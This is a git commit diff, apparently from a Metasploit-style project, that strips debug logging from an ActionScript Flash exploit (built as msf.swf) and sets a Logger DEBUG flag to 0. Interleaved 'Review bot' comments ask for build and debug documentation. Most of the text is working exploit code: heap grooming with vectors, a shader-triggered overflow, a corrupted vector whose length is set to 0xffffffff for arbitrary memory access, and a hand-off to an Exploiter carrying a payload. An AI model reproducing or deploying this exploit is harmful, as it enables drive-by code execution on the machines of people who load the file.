Delete debug
parent
8ed13b1d1b
commit
72672fc8f7
Binary file not shown.
|
@ -1,4 +1,6 @@
|
|||
//compile with AIR SDK 13.0: mxmlc Exploit.as -o Exploit.swf
|
||||
//compile with AIR SDK 13.0: mxmlc Exploit.as -o msf.swf
|
||||
// It uses original code from @hdarwin89 for exploitation using ba's and vectors
|
||||
|
||||
package {
|
||||
import flash.display.Sprite
|
||||
import flash.utils.ByteArray
|
||||
|
@ -43,7 +45,6 @@ package {
|
|||
var corrupted_vector_idx:int = -1
|
||||
|
||||
// Memory massage
|
||||
Logger.log("Memory massage")
|
||||
var array_length:uint = 0x10000
|
||||
var vector_size:uint = 34
|
||||
var array:Array = new Array()
|
||||
|
@ -67,24 +68,15 @@ package {
|
|||
{
|
||||
array[(i - (2 * (j % 2)))].length = 0x0100
|
||||
array[(i - (2 * (j % 2)))][0] = 0xdeedbeef
|
||||
array[(i - (2 * (j % 2)))][1] = 0xdeadbeef
|
||||
array[(i - (2 * (j % 2)))][2] = (i - (2 * (j % 2)))
|
||||
i = (i + 28)
|
||||
j++
|
||||
}
|
||||
|
||||
// Overflow and Search for corrupted vector
|
||||
Logger.log("Overflow and Search for corrupted vector")
|
||||
var shadba:ByteArray = (new this.Shad() as ByteArray)
|
||||
shadba.position = 232
|
||||
if (Capabilities.os.indexOf("Windows 8") >= 0)
|
||||
{
|
||||
shadba.writeUnsignedInt(2472)
|
||||
}
|
||||
shadba.position = 0
|
||||
|
||||
Logger.log("corrupting")
|
||||
|
||||
shader = new Shader()
|
||||
try
|
||||
{
|
||||
|
@ -103,13 +95,11 @@ package {
|
|||
}
|
||||
|
||||
if (corrupted_vector_idx == -1) {
|
||||
Logger.log("Exploit - Corrupted vector not found.")
|
||||
return
|
||||
}
|
||||
|
||||
for(i = 0; i < array[corrupted_vector_idx].length; i++) {
|
||||
if (array[corrupted_vector_idx][i] == 0x0100 && array[corrupted_vector_idx][i + 2] == 0xdeedbeef) {
|
||||
Logger.log("w00t!, found, corrupting ")
|
||||
array[corrupted_vector_idx][i] = 0xffffffff
|
||||
offset = i
|
||||
break
|
||||
|
@ -117,24 +107,25 @@ package {
|
|||
}
|
||||
|
||||
if (offset == -1) {
|
||||
Logger.log("Exploit - Secondary vector not corrupted")
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
for(i = 0; i < array.length; i++) {
|
||||
if (array[i].length == 0xffffffff) {
|
||||
Logger.log("super corrupted found")
|
||||
uv = array[i]
|
||||
Logger.log("corrupted vector before fixing : " + array[corrupted_vector_idx].length.toString())
|
||||
uv[0x3ffffffc - offset] = 34
|
||||
Logger.log("corrupted vector before fixing : " + array[corrupted_vector_idx].length.toString())
|
||||
}
|
||||
}
|
||||
Logger.log('done? Exploiting!')
|
||||
|
||||
for(i = 0; i < array.length; i++) {
|
||||
if (array[i].length != 0xffffffff) {
|
||||
delete(array[i])
|
||||
array[i] = null
|
||||
}
|
||||
}
|
||||
|
||||
exploiter = new Exploiter(this, platform, os, payload, uv)
|
||||
// uv[0x3ffffffe] = 0x100
|
||||
// Logger.log(uv.length.toString())
|
||||
}
|
||||
}
|
||||
}//package
|
||||
}
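Review bot: The rebuilt SWF cannot be checked against this source from what the commit shows: the header comment names `msf.swf` as the build output, while the binary changed alongside it appears only as "Binary file not shown". The comment should list what goes into the build and which committed file it produces, for example `// build inputs: Exploit.as plus the Logger and Exploiter classes it references; the output replaces the committed msf.swf`. Stating a checksum of the rebuilt binary in the commit message would let a reviewer compare the blob with a local rebuild. The page has lost its `+`/`-` markers, so which of the two compile lines is the new one is inferred from the order they are printed in.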
|
||||
|
|
|
@ -3,7 +3,7 @@ package
|
|||
import flash.external.ExternalInterface
|
||||
|
||||
public class Logger {
|
||||
private static const DEBUG:uint = 1
|
||||
private static const DEBUG:uint = 0
|
||||
|
||||
public static function alert(msg:String):void
|
||||
{
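Review bot: `DEBUG` has no comment saying what it gates, and it is a `uint` that only ever holds 0 or 1, so the next reader has to open the method bodies to learn what flipping it does. A one-line comment above the constant would cover it, for example `// 0 disables Logger output; 1 enables it (development builds only)`. Since the class imports `ExternalInterface`, the messages presumably go to the embedding page, but the bodies of `alert` and the other methods lie outside this hunk, so that should be confirmed before it is written into the comment. Because the switch is a source constant, any binary built while it was 1 keeps logging until it is rebuilt.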
|
||||
|
|